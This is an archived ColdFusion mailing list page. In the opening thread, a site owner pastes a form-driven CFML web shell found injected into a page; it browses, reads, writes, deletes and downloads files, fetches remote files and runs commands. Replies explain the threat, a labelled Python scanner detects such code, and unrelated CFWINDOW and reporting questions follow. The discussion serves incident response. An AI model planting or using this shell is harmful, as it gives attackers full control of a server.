What is this code doing? Is it harmful?
My company is running CF8 on IIS. We have a website that doesn't get much use in between biannual meetings. I just noticed the following code that was inserted into one of the subfolder's index.cfm files. I'm not seeing any other changes in any other file (yet) and the server doesn't appear to have taken a hit, but I'm not even sure what this code is doing, how it got there, and whether it's harmful. Next steps (other than yanking out the code, which I've already done)???

cfif #Form.z0# is UTF-8 CFSET O= /CFTRYCFSWITCH EXPRESSION=#Form.chopper#CFCASE VALUE=ACFSCRIPTO=OExpandpath(./)Chr(9); for(c=65;c lt 91;c=c+1){if(DirectoryExists(Chr(c):\))O=OChr(c):;}/CFSCRIPT/CFCASECFCASE VALUE=B CFDIRECTORY DIRECTORY=#Form.z1# NAME=D SORT=TypeCFLOOP Query=DCFSCRIPTO=OD.Name;If(D.Type eq Dir)O=O/; O=OChr(9)DateFormat(D.DateLastModified,-mm-dd)TimeFormat(D.DateLastModified, HH:MM:ss)Chr(9)D.SizeChr(9); If(Left(Form.z1,1) eq /){O=OD.Mode;}else{O=OD.Attributes;}O=OChr(10);/CFSCRIPT/CFLOOP/CFCASECFCASE VALUE=C CFFILE ACTION=Read FILE=#Form.z1# VARIABLE=O/CFCASECFCASE VALUE=DCFFILE ACTION=Write FILE=#Form.z1# OUTPUT=#Form.z2# CFSET O=1 //CFCASECFCASE VALUE=ECFSCRIPTFunction DF(P){F=CreateObject(java,java.io.File).init(P);L=0;i=0; if(F.isDirectory()){L=F.listFiles();for(i=1;i lte ArrayLen(L);i=i+1){if(not L[i].delete()){DF(L[i].getPath());}}}F.delete();} DF(Form.z1);O=1;/CFSCRIPT/CFCASECFCASE VALUE=Fcffile action=readbinary file=#Form.z1# variable=B / cfset J=CreateObject(java,java.nio.ByteBuffer) /cfset X=J.Allocate(JavaCast( int, ArrayLen(B)+6)) / cfset X.Put(ToBinary(ToBase64(-|)), JavaCast(int,0), 3 ) /cfset X.Put(B, JavaCast(int,0), JavaCast(int,ArrayLen(B)) ) / cfset X.Put(ToBinary(ToBase64(|-)), JavaCast(int,0), 3 ) /CFCONTENT Type=application/octet-stream Variable=#X.Array()# CFABORT/CFCASECFCASE VALUE=GCFSCRIPTF=CreateObject(java,java.io.FileOutputStream);F.init(Form.z1); h=0123456789ABCDEF;C=Form.z2;for(i=0;i lt Len(C);i=i+2){F.write(BitOr(BitSHLN(h.indexOf(C.charAt(i)),4),h.indexOf(C.charAt(i+1;} F.close();O=1;/CFSCRIPT/CFCASECFCASE VALUE=HCFFUNCTION Name=cpfCFARGUMENT Name=SCFARGUMENT Name=D CFFILE ACTION=Copy SOURCE=#S# DESTINATION=#D#/CFFUNCTIONCFSCRIPTFunction CP(S,D){sf=CreateObject(java,java.io.File).init(S); df=CreateObject(java,java.io.File).init(D);L=0;i=0;if(sf.isDirectory()){if(not df.exists()){df.mkdir();}L=sf.listFiles(); for(i=1;i lte ArrayLen(L);i=i+1){if(L[i].isDirectory()){CP(L[i].getPath(),df.getPath()/L[i].getName());}else{ cpf(L[i].getPath(),df.getPath()/L[i].getName());}}}else{cpf(S,D);}}CP(Form.z1,Form.z2);O=1;/CFSCRIPT/CFCASE CFCASE VALUE=ICFFILE ACTION=MOVE SOURCE=#Form.z1# DESTINATION=#Form.z2#CFSET O=1 //CFCASECFCASE VALUE=J CFDIRECTORY Directory=#Form.z1# Action=CreateCFSET O=1 //CFCASECFCASE VALUE=KCFSCRIPT FileSetLastModified(Form.z1,ParseDateTime(Form.z2));O=1;/CFSCRIPT/CFCASECFCASE VALUE=LCFSCRIPTZ=Form.z2; For(i=Len(Z);i gt 0;i=i-1){if(Mid(Z,i,1) eq / Or Mid(Z,i,1) eq \){Break;}}P=Left(Z,i);F=Mid(Z,i+1,256);/CFSCRIPT CFHTTP METHOD=Get URL=#Form.z1# PATH=#P# FILE=#F#CFSET O=1 //CFCASECFCASE VALUE=M CFEXECUTE Name=#Mid(Form.z1,3,Len(Form.z1)-2)# Arguments=#Mid(Form.z1,1,2)# #Form.z2# Variable=O TimeOut=60 / /CFCASE/CFSWITCHCFCATCH Type=AnyCFSET O=ERROR:// CFCatch.Message //CFCATCH /CFTRYCFOUTPUT-#Chr(124)OChr(124)#-/CFOUTPUT cfabort cfelse /cfif

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353744
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: What is this code doing? Is it harmful?
Thank you all. I am going through all of the sites on that box to see if any discernible damage has been done and have already started implementing some of the steps detailed in the Lockdown Guide Dave mentioned. What a way to start off the new year.

Scott

From: Mallory Woods mallory.wo...@gmail.com
To: cf-talk cf-talk@houseoffusion.com
Sent: Thursday, January 3, 2013 2:50 PM
Subject: Re: What is this code doing? Is it harmful?

http://stackoverflow.com/questions/13099802/cfml-strange-script-found-in-hosting-

Seems that someone has dealt with this a few months ago.

On Thu, Jan 3, 2013 at 2:22 PM, Mahcsig mahc...@mahcsig.com wrote:

It also has an option for cfexecute, and filesetlastmodified, so they could have covered some of their tracks that way. If CF is running as local system, they could have done some really bad things to the system...

~Mahcsig

On Thu, Jan 3, 2013 at 11:05 AM, Dave Watts dwa...@figleaf.com wrote:

> My company is running CF8 on IIS. We have a website that doesn't get much use in between biannual meetings. I just noticed the following code that was inserted into one of the subfolder's index.cfm files. I'm not seeing any other changes in any other file (yet) and the server doesn't appear to have taken a hit, but I'm not even sure what this code is doing, how it got there, and whether it's harmful.

Any code that can write to your server's filesystem is potentially harmful. This code appears to do that, along with listing files on your filesystem and allowing viewers to download them. Both of these things are potentially harmful, unless you explicitly want to do that.

> Next steps (other than yanking out the code, which I've already done)???

Why is CF allowed to write to the web root? If you prevent CF from writing files where it generally shouldn't, you can prevent a lot of these types of vulnerabilities. Preventing this may involve changing CF's login from SYSTEM to a non-privileged user in addition to setting filesystem permissions.

I would recommend that you read the excellent CF 9 Lockdown Guide, which I think is still on the Adobe site. Then, do the things it says to do.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
http://training.figleaf.com/

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353749
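Added example, not part of the original thread or any poster's code: because the injected code can call FileSetLastModified, modification dates are not a reliable way to find other altered files on the box, so this Python scanner triages CFML files by content instead. It flags the tags and functions seen in the injected code when they take Form or URL input; the pattern list, the file names and the sample file contents are constructed assumptions, not a complete signature set.

```python
import re
import tempfile
from pathlib import Path

CFML_EXTS = {".cfm", ".cfml", ".cfc"}

# Constructs the injected code in this thread relies on: file read/write/copy/
# move, directory listing, remote fetch, program execution, timestamp reset.
TAG = re.compile(r"<\s*(cffile|cfdirectory|cfexecute|cfhttp)\b([^>]*)>", re.I)
FUNC = re.compile(r"\b(FileSetLastModified)\s*\(([^;\n]*)", re.I)
JAVA_IO = re.compile(
    r"CreateObject\s*\(\s*[\"']?java[\"']?\s*,\s*[\"']?(java\.n?io\.[\w.]+)", re.I)
# Request-controlled scopes such as Form.z1, URL.path or form["x"].
REQUEST_INPUT = re.compile(r"\b(?:form|url)\s*(?:\.\s*\w+|\[)", re.I)


def scan_text(text):
    """Return sorted (line_number, construct, severity) tuples for one file."""
    findings = []
    for m in list(TAG.finditer(text)) + list(FUNC.finditer(text)):
        # "high": a sensitive tag/function fed directly from request input.
        if REQUEST_INPUT.search(m.group(2)):
            line = text.count("\n", 0, m.start()) + 1
            findings.append((line, m.group(1).lower(), "high"))
    for m in JAVA_IO.finditer(text):
        # "review": direct java.io / java.nio use, which needs a human look.
        line = text.count("\n", 0, m.start()) + 1
        findings.append((line, m.group(1), "review"))
    return sorted(findings)


def scan_tree(root):
    """Scan every CFML file under root by content. File timestamps are
    deliberately ignored because the injected code can reset them."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in CFML_EXTS:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report


def demo():
    """Build a constructed two-file web root and scan it."""
    samples = {
        "index.cfm": (
            "<cfoutput>#DateFormat(Now())#</cfoutput>\n"
            "<cffile action=\"read\" file=\"#ExpandPath('./motd.txt')#\" variable=\"motd\">\n"
        ),
        "meetings/index.cfm": (
            "<cfif IsDefined(\"Form.z1\")>\n"
            "<cffile action=\"write\" file=\"#Form.z1#\" output=\"#Form.z2#\">\n"
            "<cfscript>FileSetLastModified(Form.z1, ParseDateTime(Form.z2));</cfscript>\n"
            "<cfset f = CreateObject(\"java\", \"java.io.File\").init(Form.z1)>\n"
            "</cfif>\n"
        ),
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(root)


if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, hits)
```

A hit marked "review" only means the file instantiates a java.io or java.nio class, which legitimate code also does; compare those files against a known-good copy of the site.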
CFFILE in CFWINDOW
In CF8, I'm trying to upload multiple files via a CFFORM in a CFWINDOW. I've googled enough to know it can't be done with just good ol' ColdFusion since the file upload fields aren't being passed along in the form. I've looked at uploadify and some other AJAX solutions, but I don't need anything too crazy/complex. I need to stay within the window, as well as perform some validation and database inserts. I am comfortable with jQuery and AJAX, but am certainly no expert. What would be my best bet? Tha

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:347446
Adobe Solution?
I apologize in advance since this isn't a CF question, but I'm desperate and hoping this is at least an Adobe question. A client of mine wants to create a form for users to fill out electronically. He then wants to take their responses (attached via email) and upload the data to an Access 2007 database. He absolutely does not want this to be web-based. He ideally wanted me to create an interactive form in PDF. I thought, Sure, no problem. The problems I'm running into? Importing PDF data into Access appears to involve an extra step (converting the PDF to text or XML or Excel) which he/the client would have to do (since he's the one getting the returned forms). Worse is that he wants some multi-select drop-down lists in the form and I'm not seeing a way to do this in a PDF (I've played around with both Acrobat Pro and LiveCycle Designer). And without VBA skills I don't have, I'm not even seeing how to do this in an Excel or Word form. I'm getting stuck and turn to you kind sirs for your advice. How would you do this? Tha

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:346213
Re: Adobe Solution?
Yes, this is what I'm trying to accomplish. My client wants a PDF (or Excel or Word) form that he can send to people, have them fill out, and email back to him. He then wants to be able to import that data into an Access database without having to retype anything into an Access form. Eventually, he'll want reports to decipher the data. I was hoping to avoid a lot of VB since I'm not too familiar with it. There will be a lot of PDF forms, though, to justify getting to know it. I guess. After hours and hours of research, though, I still don't even know if this is possible.

Unfortunately, all of the other solutions won't work since this can't be web-based. This is a government client and I can't just put the form anywhere I want on the web. And it's too late at this point to try to find a place on one of their servers since that involves a lot of red tape. Time is not on our side. So, nothing web-based. I really wish this could all be done on the web with a SQL Server backend, but my hands are tied.

So, he wants the people to fill out a PDF form and email the form to him. Then he wants to be able to scrape the form field data off and into Access DB. Does that sound like the issue? There probably is a better solution using Visual Basic. You might be able to write something in VB to use an Acrobat component to read the PDF and fish out the form data and put it in the database table for each PDF. You might even be able to do this in batch form. There would need to be a lot of PDF forms to make it worth doing though. There is a reason that web/database work i

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:346220
Re: Report Builder
The users aren't going to be too technically proficient. Just your average group of users. I think Report Builder is going to make their heads explode. I was hoping for something user-friendly that would allow them to customize what data appears in a report and where (allow them to change the layout somewhat). Should I simply be thinking of making my own AJAXy kind of front-end?

Thanks,
Scott

--- On Wed, 11/3/10, Dave Watts dwa...@figleaf.com wrote:

It really depends on two things. First, how technically proficient are these users? Do they have experience using banded report generators? Second, do you want to allow them the level of access to the server needed to generate reports with Report Builder?

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:338832
Report Builder
I want to give the users of my CF 8 site the ability to dynamically generate reports. I've never used Report Builder before. Will non-technical users be able to use this, or will something else be better suited for them?

Thanks,
Scott

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:338800
Creating a custom workflow process
I need to give the admin users of a website I'm developing the ability to create a custom workflow. They would need to be able to name the first step in the process and then specify if this is true/yes, go here and if no, go here. Then, when someone is working on something in the workflow, they want to be able to graphically display a "you are here" sort of diagram. Has anyone done something similar? I can sort of picture the database structure, but I can't wrap my head around the image short of creating a separate image for each step in the process. Which defeats the purpose of having this all be customizable/dynamic.

Thanks,
Scott

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:337231
RE: Creating a custom workflow process
Yes. Let's say this is a proposal bidding process. One company might need the ability to enter three steps in their proposal process. Another company might have 20 steps. I want them to have as many or as few steps as they need. An example process could be: Does the proposal fit our strategic decision? Yes - Do we have a strong client relationship? Yes - Do we have a competitive edge? No - Can we improve it? No - Should we proceed? Yes - Do we have a strong client relationship? No - end of process And so on. I'm trying to build a dynamic decision tree. I'm also then wanting to show people where they are in this tree. Is there a way to graphi

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:337234
IE 8 messing up my tables in a CFWINDOW
I'm using ColdFusion.Window.create() in a link to open another window. In the pop-up window (yes, I know it's technically a div and not a pop-up window), I have a table. The contents of this pop-up window display just fine in IE 7 and Firefox 3, but not IE 8. In IE 8, everything before and after the table appears in the browser. Everything between the table tags, though, is ignored. Why? It's a very simple table. And even when I pare the code down to just <table><tr><td>Hello World!</td></tr></table>, I still can't get the text to appear. Why is IE 8 messing this up?

Thanks,
Scott

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:325347
Re: IE 8 messing up my tables in a CFWINDOW
I must confess -- I didn't even know about that mode. Yes, the problem goes away when I turn on Compatibility View. When Compatibility View is checked, I can see the text/data in the table just fine. When I uncheck Compatibility View, I'm back to a blank screen.

--- On Tue, 8/11/09, Mike Chabot mcha...@gmail.com wrote:

Does the problem go away when you switch to MSIE 7 compatibility mode within MSIE 8?

-Mike Chabot

On Tue, Aug 11, 2009 at 2:41 PM, Scott Spurlock spurlock.sc...@yahoo.com wrote:

I'm using ColdFusion.Window.create() in a link to open another window. In the pop-up window (yes, I know it's technically a div and not a pop-up window), I have a table. The contents of this pop-up window display just fine in IE 7 and Firefox 3, but not IE 8. In IE 8, everything before and after the table appears in the browser. Everything between the table tags, though, is ignored. Why? It's a very simple table. And even when I pare the code down to just <table><tr><td>Hello World!</td></tr></table>, I still can't get the text to appear. Why is IE 8 messing this up?

Thanks,
Scott

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:325352
RE: IE 8 messing up my tables in a CFWINDOW
Geez, that was it?!? Brilliant! Problem solved! It's now working in all browsers. Thank you!

Scott

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:325355
More cfwindow problems
I'm pretty new to this whole AJAX thing, so please bear with me. I had tried to implement some cfwindow functionality in the past and didn't find it flexible enough for my needs. So I've been trying to learn jQuery. I've got one plugin working and now I'm trying to use the Star Rating widget (http://orkan.jaslo4u.pl/star_rating/index.html#overview) in a form in a cfwindow. And that's where the lightbulb's not going on. Should the jQuery code be on the original page or in the cfwindow? I know I need the cfajaximport tag on the original page -- do I need it in the cfwindow code too? I can get the window to open up, but I can't get the jQuery code to run. Should I just ditch this cfwindow stuff altogether???

Scott

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:315610
passing from form to form
I have a cfdiv with a cfform inside of it. I can submit from the first cfform to a second cfform no problem. But when I submit from the second cfform to a third cfform, I break out of the cfdiv. Why?

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:314566
Re: passing from form to form
Second form is a cfform as well. With all cfforms, I have the form submit back to itself, do some processing, and then cflocation to the next cfform. The first cfform submits just fine to the second cfform. The second cfform processes just fine and submits to the third cfform, but it breaks it out of the cfdiv. Even if I replace the third cfform with hello and nothing else, I just get hello on the screen.

From: Azadi Saryev [EMAIL PROTECTED]
To: cf-talk cf-talk@houseoffusion.com
Sent: Wednesday, October 29, 2008 3:53:41 PM
Subject: Re: passing from form to form

hmm... is your second form a CFFORM as well or a regular FORM tag?

Azadi Saryev
Sabai-dee.com
http://www.sabai-dee.com/

Scott Spurlock wrote:

I have a cfdiv with a cfform inside of it. I can submit from the first cfform to a second cfform no problem. But when I submit from the second cfform to a third cfform, I break out of the cfdiv. Why?

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:314568
Passing info from CFWINDOW to CFDIV
I have a page with a CFDIV. In the CFDIV is a CFFORM. In the CFFORM, I have a link that when clicked opens up a CFWINDOW where the user answers a few more questions. How do I pass the data obtained in the CFWINDOW back to the original page? I want the form in the CFDIV to continue to display after the CFWINDOW closes and I also ideally want the data that was just passed into the form to now appear. Is this possible?

Thanks,
Scott

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:314097
Scrollbars in CFWINDOW
Hello there. I'm using the following to create a CFWINDOW:

onClick="javascript:ColdFusion.Window.create('productDetails','Product Details','details.cfm?ProductID=#ProductID#', {x:150, y:25, resizable:true, height:600, width:900, draggable:true});"

Works great in IE except for the fact that the scrollbars aren't automatically appearing. I have to resize the window for them to appear. How do I get them to automatically appear? Increasing the height of the window won't help. There's just too much stuff on the page.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:313015